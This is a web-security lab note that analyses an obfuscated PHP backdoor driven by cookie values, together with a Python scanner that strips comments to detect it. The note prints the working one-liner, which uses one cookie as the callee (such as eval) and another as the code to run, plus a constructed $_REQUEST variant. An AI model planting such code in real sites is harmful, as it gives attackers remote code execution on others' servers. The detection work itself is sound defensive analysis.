Simple $_COOKIE backdoor (variation)

Labs Note

There are many ways to develop a backdoor, and virtually all of them share a similar goal – not to be discovered. To achieve that, some attackers are giving up on $_POST and $_GET variables, obfuscation techniques, etc., and are instead using $_COOKIE values to execute their code remotely.

The following code is a variation of a sample from a relatively recent malware wave (described by one of our researchers, Yuliyan, at http://labs.sucuri.net/?note=2017/03/09):

<?php /*VdJR*/if(isset($_COOKIE["uFo"]))/*VO*/{$_COOKIE["JmR"]($_COOKIE["uFo"]);/*noRM*/exit;/*uDV*/}

As you can see, it works very similarly to other backdoors that use $_POST or $_GET variables instead of $_COOKIE. With this code, the attacker simply needs to set the “uFo” and “JmR” cookies: “JmR” holds the name of the function to call (the post gives “eval” as the example), and “uFo” holds the code to be executed.

You can also notice the random comments between the statements, an attempt to avoid detection by the simple static signatures used by some anti-malware solutions (these comments may vary in content and position, or may not be present at all). This type of injection is not limited to a particular file or directory: during our investigation, we detected several variants scattered throughout the file system.
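The comment-juggling described above defeats signatures that match the raw bytes of the one-liner, but not a scanner that normalises the source first. The following Python script is an added example written for this note, not Sucuri's own tooling: it strips PHP comments while leaving string literals intact, then looks for the underlying pattern of one superglobal value being called as a function with another superglobal value as its argument ($_COOKIE, $_GET, $_POST and $_REQUEST). The sample from this note is used as one input; the variant and the benign file are constructed for the example.

```python
"""Scan PHP source for superglobal-driven variable function calls.

Added example (not Sucuri's code). Detects $_COOKIE["a"]($_COOKIE["b"])
and the $_GET/$_POST/$_REQUEST equivalents even when junk comments are
interleaved between the tokens, by removing comments before matching.
"""
import re
from typing import Dict, List, Tuple

SUPERGLOBALS = ("_COOKIE", "_GET", "_POST", "_REQUEST")


def strip_php_comments(src: str) -> str:
    """Remove /* */, // and # comments, leaving string literals untouched.

    Tracks quote state so that "http://example.test" inside a string is not
    treated as a comment. Line comments end at a newline or at '?>' (as in
    PHP); '#[' is a PHP 8 attribute, not a comment, and is kept.
    """
    out: List[str] = []
    i, n = 0, len(src)
    quote = None  # active string delimiter, or None when outside a string
    while i < n:
        c = src[i]
        if quote:
            out.append(c)
            if c == "\\" and i + 1 < n:  # keep the escaped character as-is
                out.append(src[i + 1])
                i += 2
                continue
            if c == quote:
                quote = None
            i += 1
        elif c in ("'", '"'):
            quote = c
            out.append(c)
            i += 1
        elif src.startswith("/*", i):
            end = src.find("*/", i + 2)
            i = n if end == -1 else end + 2  # unterminated comment eats the rest
            out.append(" ")  # a comment separates tokens like whitespace does
        elif src.startswith("//", i) or (c == "#" and not src.startswith("#[", i)):
            ends = [p for p in (src.find("\n", i), src.find("?>", i)) if p != -1]
            i = min(ends) if ends else n  # resume at the newline or '?>' itself
        else:
            out.append(c)
            i += 1
    return "".join(out)


_SG = "|".join(SUPERGLOBALS)
# $_X[ 'key' ] ( $_Y[ 'key' ] ): a request value used as the callee, another as the argument.
_CALL_RE = re.compile(
    r"\$(" + _SG + r")\s*\[\s*(['\"])([^'\"]*)\2\s*\]"  # groups 1-3: callee
    r"\s*\(\s*"
    r"\$(" + _SG + r")\s*\[\s*(['\"])([^'\"]*)\5\s*\]"  # groups 4-6: argument
    r"\s*\)"
)


def find_superglobal_calls(src: str) -> List[Tuple[str, str, str, str]]:
    """Return (callee_superglobal, callee_key, arg_superglobal, arg_key) per hit."""
    cleaned = strip_php_comments(src)
    return [(m.group(1), m.group(3), m.group(4), m.group(6)) for m in _CALL_RE.finditer(cleaned)]


def scan_files(files: Dict[str, str]) -> Dict[str, List[Tuple[str, str, str, str]]]:
    """Map each path to its findings; paths with no findings are omitted."""
    return {path: hits for path, src in files.items() if (hits := find_superglobal_calls(src))}


# The one-liner quoted in this note (comments interleaved between tokens).
SAMPLE_FROM_NOTE = (
    '<?php /*VdJR*/if(isset($_COOKIE["uFo"]))/*VO*/'
    '{$_COOKIE["JmR"]($_COOKIE["uFo"]);/*noRM*/exit;/*uDV*/}'
)
# Constructed variant: different comment junk, single quotes, $_REQUEST instead of $_COOKIE.
CONSTRUCTED_VARIANT = (
    "<?php if(isset($_REQUEST['x'])){ $_REQUEST/*aa*/['f']/*bb*/(/*cc*/$_REQUEST['x']); }"
)
# Constructed benign file: reads a cookie normally, with a URL inside a string.
CONSTRUCTED_BENIGN = (
    '<?php $lang = $_COOKIE["lang"] ?? "en"; $home = "http://example.test/"; '
    "echo htmlspecialchars($lang); // language cookie"
)

if __name__ == "__main__":
    report = scan_files({
        "wp-content/uploads/constructed-a.php": SAMPLE_FROM_NOTE,
        "wp-includes/constructed-b.php": CONSTRUCTED_VARIANT,
        "index.php": CONSTRUCTED_BENIGN,
    })
    for path, hits in report.items():
        for callee_sg, callee_key, arg_sg, arg_key in hits:
            print(f"{path}: ${callee_sg}[{callee_key!r}](${arg_sg}[{arg_key!r}])")
```

Because the match runs on comment-stripped text, moving, renaming or deleting the junk comments does not change the result, while a file that merely reads $_COOKIE["lang"] produces no finding. Treat a hit as a reason to inspect the file, not as proof of compromise on its own.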

If your website is getting reinfected very often, there might be a backdoor somewhere and we would love to clean it for you. If you need security experts to look after your website security, let us know.
